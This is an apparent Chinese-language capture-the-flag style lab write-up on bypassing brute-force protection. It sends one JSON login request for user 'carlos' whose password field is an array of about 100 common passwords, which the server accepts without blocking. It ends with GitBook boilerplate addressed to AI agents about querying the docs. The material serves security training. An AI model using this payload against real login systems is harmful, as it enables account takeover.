> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/web/authentication/broken-brute-force-protection-with-multiple-credentials-per-request.md).

# 每个请求包含多个凭据的脆弱暴力破解防护

### 失效的暴力破解防护：每个请求包含多个凭据

本实验展示了针对暴力破解攻击的防护机制中的一个逻辑缺陷。/ 目标是 **找到用户 carlos 的密码** 并访问其页面 **我的账户**.

* **目标用户**: `carlos`
* **候选密码列表**：由实验提供
* **入口点**：登录表单

<figure><img src="/files/67898128cb3ffa18c89436820fe5846f1222d281" alt=""><figcaption></figcaption></figure>

**行为观察**

在分析登录表单时，发送到服务器的请求采用 **JSON** 格式，包含以下字段：

```json
{
    "username":"carlos",
    "password":"password"
}
```

反暴力破解防护似乎是基于发送的 \*\* HTTP 请求\*\* 数量，而不是 \*\* 实际测试的密码\*\* 数量。

**利用逻辑缺陷**

无需发送密码查询，也可以传输 **在一次查询中发送多个密码**，使用 JSON 数组作为 `密码` 字段。

{% code overflow="wrap" %}

```json
{
  "username": "carlos",
  "password": ["123456","password","12345678","qwerty","123456789","12345","1234","111111","1234567","dragon","123123","baseball","abc123","football","monkey","letmein","shadow","master","666666","qwertyuiop","123321","mustang","1234567890","michael","654321","superman","1qaz2wsx","7777777","121212","000000","qazwsx","123qwe","killer","trustno1","jordan","jennifer","zxcvbnm","asdfgh","hunter","buster","soccer","harley","batman","andrew","tigger","sunshine","iloveyou","2000","charlie","robert","thomas","hockey","ranger","daniel","starwars","klaster","112233","george","computer","michelle","jessica","pepper","1111","zxcvbn","555555","11111111","131313","freedom","777777","pass","maggie","159753","aaaaaa","ginger","princess","joshua","cheese","amanda","summer","love","ashley","nicole","chelsea","biteme","matthew","access","yankees","987654321","dallas","austin","thunder","taylor","matrix","mobilemail","mom","monitor","monitoring","montana","moon","moscow"]
}
```

{% endcode %}

服务器 \*\*接受该请求\*\* 并测试数组中包含的所有密码， **且不会触发阻断机制**.

<figure><img src="/files/64ce34cbc25711ba9721aaf6f3e61d28d2f009c9" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/web/authentication/broken-brute-force-protection-with-multiple-credentials-per-request.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
